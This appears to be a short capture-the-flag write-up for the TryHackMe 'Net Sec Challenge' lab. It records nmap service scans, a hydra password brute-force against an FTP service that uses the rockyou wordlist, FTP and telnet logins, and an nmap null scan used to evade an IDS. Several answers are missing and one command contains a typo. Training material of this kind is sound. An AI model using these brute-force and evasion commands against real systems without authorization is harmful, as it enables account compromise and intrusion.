# Net Sec Challenge
###### tags: `tryhackme`
[TOC]
target: 10.10.152.68

---
## What is the highest port number being open less than 10,000?

Ans:8080
## What is the flag hidden in the HTTP server header?

## What is the flag hidden in the SSH server header?
```
nmap -sC -sV -p22 -Pn 10.10.152.68 -T4
```

## We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
```
nmap -p10021 -sC -sV -Pn 10.10.152.68 -T4 -v
```

---
## We learned two usernames using social engineering: `eddie` and `quinn`. What is the flag hidden in one of these two account files and accessible via FTP?
```
echo "eddie\r\nquinn" >> username.txt
```
```
hydra -L username.txt -P rockyou.txt 10.10.152.68 ftp -s 10021 -t 16 -vv
```

```
telent 10.10.152.68 10021
```

```
ftp 10.10.152.68 -P 10021
```

Download file
```
ftp> get (filename)
```

---

## Browsing to `http://10.10.152.68:8080` displays a small challenge that will give you a flag once you solve it. What is the flag?

By pass IDS
```
nmap -sN IP
```
flag = null